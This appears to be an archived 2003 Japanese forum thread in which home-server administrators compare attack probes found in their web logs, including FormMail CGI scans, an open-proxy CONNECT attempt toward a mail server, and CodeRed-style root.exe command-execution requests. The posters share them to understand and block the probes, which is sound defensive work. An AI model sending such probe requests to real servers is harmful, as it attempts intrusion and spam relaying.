wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184

87 :03/04/09
板違いだけどついでにこれも
0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-"
多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。

88 :03/04/10
>>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。
>>87 は外部から任意のポートに接続できるプロクシを狙った spammer。

89 :03/04/10
最近、CONNECT〜が増えてきましたね

90 :03/04/10
あの手、この手ですよね。
まえにスパムを配信するウイルスの実験が行われていた可能性があると
記事で読んだ記憶があるけど。
スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。

91 :03/04/11
メールヘッダーが変なんですけど。何かわかりますかね。
ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。
本文はスパムみたいなんですけど、sendmailのバグを狙っているような...
ワームの様な気もしてます。。。
Return-Path: <mailbox1@usgreencardoffice.com>
Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111])
by xxxx.jp (8.12.8/8.12.5)
with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>;
Fri, 11 Apr 2003 22:11:19 +0900
Received: from [154.33.63.58] (helo=mail8.cwidc.net)
by smtp1.cwidc.net
with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:11:01 +0900
Received: from pop
by mail8.cwidc.net
with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:10:57 +0900
Received: from [206.40.228.122] (helo=sm22.localdomain)
by mail8.cwidc.net
with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00;
Fri, 11 Apr 2003 22:10:56 +0900
Received: from unknown
Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT)
Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain>
Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz
B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC
F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei
ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C];
A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re
ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688]
@C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq
R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6>
2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re
ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@]
;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive
d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C];
A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT
T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]:
?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C];
ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]:
?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB]
@C];ARz M
Errors: mailbox1@usgreencardoffice.com
From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com>
To: Customer <customer@usgreencardoffice.com>
Subject: Get a Green Card for USA
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:

92 :03/04/13
うざい
219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"



前にCodeRedに対抗するCode Greenてのが来たけど
もう来ないな。
またこないかな。

93 :03/04/15
OrgName: Asia Pacific Network Information Centre
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
ここ、IPうじゃうじゃ持ってて最高にうざい。
二日で100個以上CodeRed来てるけど、ここが8割占めてたw
LAN内全感染の悪寒。
ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが
全部穴になって被害を広めてるのね。
#Apache初心者だから、ログを取らせない方法が良くわかんねえよ。
・ウイルス扱いにする。
・指定ファイルにアクセスしようとしたのは載せない。
・実際に、0Byteの指定ファイルを作っておく。
があった。みんなどうよ?つーかどれが普通よ?

94 :03/04/15
略称のほうは知ってた・・
APNICかよ。
マトモなとこだから他から経由されてるだけな気がするな・・・

95 :03/04/15
>>93
それ中国あたりのブロック割り当てじゃない?
うちにも中国方面からガンガンくるよ。

96 :03/04/15
>>93
ルーターで弾く。

97 :03/04/15
>>96
手作業での登録ですか?
手間が馬鹿にならんので、テクニックあればいいんだけど。

98 :03/04/15
>>95
JPNIC に関連団体で乗ってるところ。ほんとに感染してるなら微妙に恥かと。
http://216.239.57.100/search?q=cache:5uDTH1GaA9oC:www.nic.ad.jp/ja/profile/link.html+Asia+Pacific+Network+Information+Centre&hl=ja&lr=lang_ja&ie=UTF-8

99 :03/04/15
>>93
ネタだよね?ね?ね?

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
【また!?】akihiko-net Part1【厨房かよ!】 (101)
忍者が雪隠で詰んでるスレ (124)
【age】広告ホイホイ@自宅サーバ板【進行】 (507)
【激写】自宅鯖写真で晒す【5台目】 (328)
PC1台しかないのに自宅鯖やってる奴の数→ (113)
自宅鯖に最適なPCがついにきた (133)
--log9.info------------------
【三部作】MAXWELL 3【貫徹祈願】 (301)
ヴォーカルグループ コーラスグループ (695)
【Let Me】mario【Love You】 (508)
曲名がわかりません@R&B Part2 (568)
NE-YO Part.5 (751)
【HUMAN】SEAL-シール【BEING】 (304)
+ RB・SOUL 今あなたは何を聞いてますか? + (925)
Aaliyah 〜一時代を築いたカリスマ〜 Vol.1 (894)
ねとらじ@R&B・SOUL板 (155)
【このアフロに】NATE JAMES【気をつけろ!】 (123)
●ダラス・オースティン最高★サミーTLC安室奈美恵他● (140)
安室ちゃんの尊敬するLauryn Hill (389)
全部のアルバムが良く出来てるアーティスト (101)
「No Es Amor」☆Frankie J☆@スレ目 (126)
Heather Headley へザー・ヘッドリー (130)
Stevie Wonder Part8 (139)
--log55.com------------------
【I-SKY】SKE48 Passion For You★61
★俺的糞ゲー処刑ブログ 15ブログ目
★☆⭐★エマのスレ17★⭐
【CF食い逃げ】糞野郎ゴミ屑おじさん寛(ひろし)のSSをみんなで考えるスレ【とりやきふぎぃ】
★Cielと愉快な仲間達1
【八方塞がり詐欺師】糞野郎ゴミ屑おじさん寛(ひろし)のSSをみんなで考えるスレ【仮想通貨つかさ製菓】
★完美世界 -perfect world- ベテル鯖 晒しスレ73
インスタ育児関連ヲチ★86【妊婦日記OK】